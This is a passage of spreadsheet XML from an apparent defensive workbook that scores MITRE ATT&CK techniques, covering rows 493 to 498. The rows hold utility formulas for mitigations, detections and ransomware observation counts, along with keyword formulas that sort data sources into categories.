      <c r="AG493" s="37" t="str" cm="1">
        <f t="array" ref="AG493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD493)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH493" s="37">
        <v>489</v>
      </c>
      <c r="AI493" s="37" t="str" cm="1">
        <f t="array" ref="AI493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ493" s="37">
        <v>489</v>
      </c>
      <c r="AK493" s="37" t="str" cm="1">
        <f t="array" ref="AK493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL493" s="37">
        <v>489</v>
      </c>
      <c r="AM493" s="37" t="str" cm="1">
        <f t="array" ref="AM493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN493" s="37">
        <v>0</v>
      </c>
      <c r="AO493" s="37">
        <v>3</v>
      </c>
      <c r="AP493" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ493" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>146.29861028571429</v>
      </c>
      <c r="AR493" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS493" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT493" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU49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10.521329306122448</v>
      </c>
    </row>
    <row r="494" spans="1:47" ht="17">
      <c r="A494" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B494" s="37">
        <f t="shared" si="7"/>
        <v>438.89084971428571</v>
      </c>
      <c r="C494" s="37" t="s">
        <v>1717</v>
      </c>
      <c r="D494" s="50" t="s">
        <v>1715</v>
      </c>
      <c r="E494" s="37" t="s">
        <v>1718</v>
      </c>
      <c r="F494" s="37">
        <v>1</v>
      </c>
      <c r="G494" s="37">
        <v>1</v>
      </c>
      <c r="H494" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I494" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J494" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K494" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L494" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M494" s="37">
        <v>0</v>
      </c>
      <c r="N494" s="56">
        <v>0</v>
      </c>
      <c r="O494" s="56">
        <v>0</v>
      </c>
      <c r="P494" s="56">
        <v>0</v>
      </c>
      <c r="Q494" s="56">
        <v>0</v>
      </c>
      <c r="R494" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S494" s="57">
        <v>2</v>
      </c>
      <c r="T494" s="57" t="s">
        <v>1716</v>
      </c>
      <c r="U494" s="57">
        <v>11</v>
      </c>
      <c r="V494" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380971428571429</v>
      </c>
      <c r="W494" s="37">
        <v>13</v>
      </c>
      <c r="X494" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y494" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z494" s="37">
        <v>0</v>
      </c>
      <c r="AA494" s="37">
        <v>0</v>
      </c>
      <c r="AB494" s="37">
        <v>0</v>
      </c>
      <c r="AC494" s="37"/>
      <c r="AD494" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE494" s="37" t="str" cm="1">
        <f t="array" ref="AE494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF494" s="37">
        <v>490</v>
      </c>
      <c r="AG494" s="37" t="str" cm="1">
        <f t="array" ref="AG494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD494)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH494" s="37">
        <v>490</v>
      </c>
      <c r="AI494" s="37" t="str" cm="1">
        <f t="array" ref="AI494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ494" s="37">
        <v>490</v>
      </c>
      <c r="AK494" s="37" t="str" cm="1">
        <f t="array" ref="AK494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL494" s="37">
        <v>490</v>
      </c>
      <c r="AM494" s="37" t="str" cm="1">
        <f t="array" ref="AM494">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD494)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN494" s="37">
        <v>0</v>
      </c>
      <c r="AO494" s="37">
        <v>4</v>
      </c>
      <c r="AP494" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ494" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>146.2969499047619</v>
      </c>
      <c r="AR494" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS494" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT494" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU49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14.028280943310657</v>
      </c>
    </row>
    <row r="495" spans="1:47" ht="17">
      <c r="A495" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B495" s="37">
        <f t="shared" si="7"/>
        <v>701.78608857142854</v>
      </c>
      <c r="C495" s="37" t="s">
        <v>1719</v>
      </c>
      <c r="D495" s="50" t="s">
        <v>1715</v>
      </c>
      <c r="E495" s="37" t="s">
        <v>1720</v>
      </c>
      <c r="F495" s="37">
        <v>1</v>
      </c>
      <c r="G495" s="37">
        <v>1</v>
      </c>
      <c r="H495" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I495" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J495" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K495" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L495" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M495" s="37">
        <v>0</v>
      </c>
      <c r="N495" s="56">
        <v>0</v>
      </c>
      <c r="O495" s="56">
        <v>8</v>
      </c>
      <c r="P495" s="56">
        <v>9</v>
      </c>
      <c r="Q495" s="56">
        <v>11</v>
      </c>
      <c r="R495" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S495" s="57">
        <v>2</v>
      </c>
      <c r="T495" s="57" t="s">
        <v>1716</v>
      </c>
      <c r="U495" s="57">
        <v>11</v>
      </c>
      <c r="V495" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.2571430476190476</v>
      </c>
      <c r="W495" s="37">
        <v>13</v>
      </c>
      <c r="X495" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y495" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z495" s="37">
        <v>28</v>
      </c>
      <c r="AA495" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AB495" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AC495" s="37"/>
      <c r="AD495" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE495" s="37" t="str" cm="1">
        <f t="array" ref="AE495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF495" s="37">
        <v>491</v>
      </c>
      <c r="AG495" s="37" t="str" cm="1">
        <f t="array" ref="AG495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD495)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH495" s="37">
        <v>491</v>
      </c>
      <c r="AI495" s="37" t="str" cm="1">
        <f t="array" ref="AI495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ495" s="37">
        <v>491</v>
      </c>
      <c r="AK495" s="37" t="str" cm="1">
        <f t="array" ref="AK495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL495" s="37">
        <v>491</v>
      </c>
      <c r="AM495" s="37" t="str" cm="1">
        <f t="array" ref="AM495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN495" s="37">
        <v>0</v>
      </c>
      <c r="AO495" s="37">
        <v>3</v>
      </c>
      <c r="AP495" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ495" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>233.92869619047619</v>
      </c>
      <c r="AR495" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS495" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT495" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU49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16.780621156462587</v>
      </c>
    </row>
    <row r="496" spans="1:47" ht="68">
      <c r="A496" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B496" s="37">
        <f t="shared" si="7"/>
        <v>3595.7685788095241</v>
      </c>
      <c r="C496" s="37" t="s">
        <v>1721</v>
      </c>
      <c r="D496" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E496" s="37"/>
      <c r="F496" s="37">
        <v>4</v>
      </c>
      <c r="G496" s="37">
        <v>3</v>
      </c>
      <c r="H496" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I496" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J496" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K496" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L496" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M496" s="37">
        <v>1</v>
      </c>
      <c r="N496" s="56">
        <v>1</v>
      </c>
      <c r="O496" s="56">
        <v>22</v>
      </c>
      <c r="P496" s="56">
        <v>1</v>
      </c>
      <c r="Q496" s="56">
        <v>4</v>
      </c>
      <c r="R496" s="57" t="s">
        <v>1723</v>
      </c>
      <c r="S496" s="57">
        <v>17</v>
      </c>
      <c r="T496" s="57" t="s">
        <v>1724</v>
      </c>
      <c r="U496" s="57">
        <v>19</v>
      </c>
      <c r="V496" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.47619023809523808</v>
      </c>
      <c r="W496" s="37">
        <v>36</v>
      </c>
      <c r="X496" s="37">
        <v>0.65454500000000004</v>
      </c>
      <c r="Y496" s="37">
        <v>0.65454500000000004</v>
      </c>
      <c r="Z496" s="37">
        <v>28</v>
      </c>
      <c r="AA496" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AB496" s="37">
        <v>0.28000000000000003</v>
      </c>
      <c r="AC496" s="37"/>
      <c r="AD496" s="50" t="s">
        <v>1725</v>
      </c>
      <c r="AE496" s="37" t="str" cm="1">
        <f t="array" ref="AE496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD496)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF496" s="37">
        <v>492</v>
      </c>
      <c r="AG496" s="37" t="str" cm="1">
        <f t="array" ref="AG496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH496" s="37">
        <v>492</v>
      </c>
      <c r="AI496" s="37" t="str" cm="1">
        <f t="array" ref="AI496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD496)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ496" s="37">
        <v>492</v>
      </c>
      <c r="AK496" s="37" t="str" cm="1">
        <f t="array" ref="AK496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL496" s="37">
        <v>492</v>
      </c>
      <c r="AM496" s="37" t="str" cm="1">
        <f t="array" ref="AM496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN496" s="37">
        <v>0</v>
      </c>
      <c r="AO496" s="37">
        <v>1</v>
      </c>
      <c r="AP496" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ496" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1198.5895262698414</v>
      </c>
      <c r="AR496" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS496" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT496" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU49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28.561655387377176</v>
      </c>
    </row>
    <row r="497" spans="1:47" ht="34">
      <c r="A497" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B497" s="37">
        <f t="shared" si="7"/>
        <v>939.5235276666665</v>
      </c>
      <c r="C497" s="37" t="s">
        <v>1726</v>
      </c>
      <c r="D497" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E497" s="37" t="s">
        <v>1727</v>
      </c>
      <c r="F497" s="37">
        <v>1</v>
      </c>
      <c r="G497" s="37">
        <v>1</v>
      </c>
      <c r="H497" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I497" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J497" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K497" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L497" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M497" s="37">
        <v>0</v>
      </c>
      <c r="N497" s="56">
        <v>0</v>
      </c>
      <c r="O497" s="56">
        <v>42</v>
      </c>
      <c r="P497" s="56">
        <v>2</v>
      </c>
      <c r="Q497" s="56">
        <v>5</v>
      </c>
      <c r="R497" s="57" t="s">
        <v>1728</v>
      </c>
      <c r="S497" s="57">
        <v>6</v>
      </c>
      <c r="T497" s="57" t="s">
        <v>1729</v>
      </c>
      <c r="U497" s="57">
        <v>9</v>
      </c>
      <c r="V497" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37619033333333329</v>
      </c>
      <c r="W497" s="37">
        <v>15</v>
      </c>
      <c r="X497" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y497" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z497" s="37">
        <v>49</v>
      </c>
      <c r="AA497" s="37">
        <v>0.49</v>
      </c>
      <c r="AB497" s="37">
        <v>0.49</v>
      </c>
      <c r="AC497" s="37"/>
      <c r="AD497" s="50" t="s">
        <v>1730</v>
      </c>
      <c r="AE497" s="37" t="str" cm="1">
        <f t="array" ref="AE497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD497)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF497" s="37">
        <v>493</v>
      </c>
      <c r="AG497" s="37" t="str" cm="1">
        <f t="array" ref="AG497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH497" s="37">
        <v>493</v>
      </c>
      <c r="AI497" s="37" t="str" cm="1">
        <f t="array" ref="AI497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD497)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ497" s="37">
        <v>493</v>
      </c>
      <c r="AK497" s="37" t="str" cm="1">
        <f t="array" ref="AK497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL497" s="37">
        <v>493</v>
      </c>
      <c r="AM497" s="37" t="str" cm="1">
        <f t="array" ref="AM497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN497" s="37">
        <v>0</v>
      </c>
      <c r="AO497" s="37">
        <v>2</v>
      </c>
      <c r="AP497" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ497" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>313.17450922222218</v>
      </c>
      <c r="AR497" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS497" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT497" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU49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14.960690915343912</v>
      </c>
    </row>
    <row r="498" spans="1:47" ht="34">
      <c r="A498" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B498" s="37">
        <f t="shared" si="7"/>
        <v>593.09981171428569</v>
      </c>
      <c r="C498" s="37" t="s">
        <v>1731</v>
      </c>
      <c r="D498" s="50" t="s">
        <v>1722</v>
      </c>
      <c r="E498" s="37" t="s">
        <v>1732</v>
      </c>
      <c r="F498" s="37">
        <v>1</v>
      </c>
      <c r="G498" s="37">
        <v>1</v>
      </c>
      <c r="H498" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I498" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J498" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K498" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L498" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M498" s="37">
        <v>0</v>
      </c>
      <c r="N498" s="56">
        <v>0</v>
      </c>
      <c r="O498" s="56">
        <v>0</v>
      </c>
      <c r="P498" s="56">
        <v>0</v>
      </c>
      <c r="Q498" s="56">
        <v>0</v>
      </c>
      <c r="R498" s="57" t="s">
        <v>1733</v>
      </c>
      <c r="S498" s="57">
        <v>12</v>
      </c>
      <c r="T498" s="57" t="s">
        <v>1734</v>
      </c>
      <c r="U498" s="57">
        <v>9</v>
      </c>
      <c r="V498" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999990476190477</v>
      </c>
      <c r="W498" s="37">
        <v>21</v>
      </c>
      <c r="X498" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y498" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z498" s="37">
        <v>0</v>
      </c>
      <c r="AA498" s="37">
        <v>0</v>
      </c>
      <c r="AB498" s="37">
        <v>0</v>
      </c>
      <c r="AC498" s="37"/>
      <c r="AD498" s="50" t="s">
        <v>1735</v>
      </c>
      <c r="AE498" s="37" t="str" cm="1">
        <f t="array" ref="AE498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD498)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF498" s="37">
        <v>494</v>
      </c>
      <c r="AG498" s="37" t="str" cm="1">
        <f t="array" ref="AG498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD498)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH498" s="37">
        <v>494</v>
      </c>
      <c r="AI498" s="37" t="str" cm="1">
        <f t="array" ref="AI498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD498)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ498" s="37">
        <v>494</v>
      </c>
      <c r="AK498" s="37" t="str" cm="1">
        <f t="array" ref="AK498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD498)))))&gt;0,"1","0")</f>
        <v>0</v>
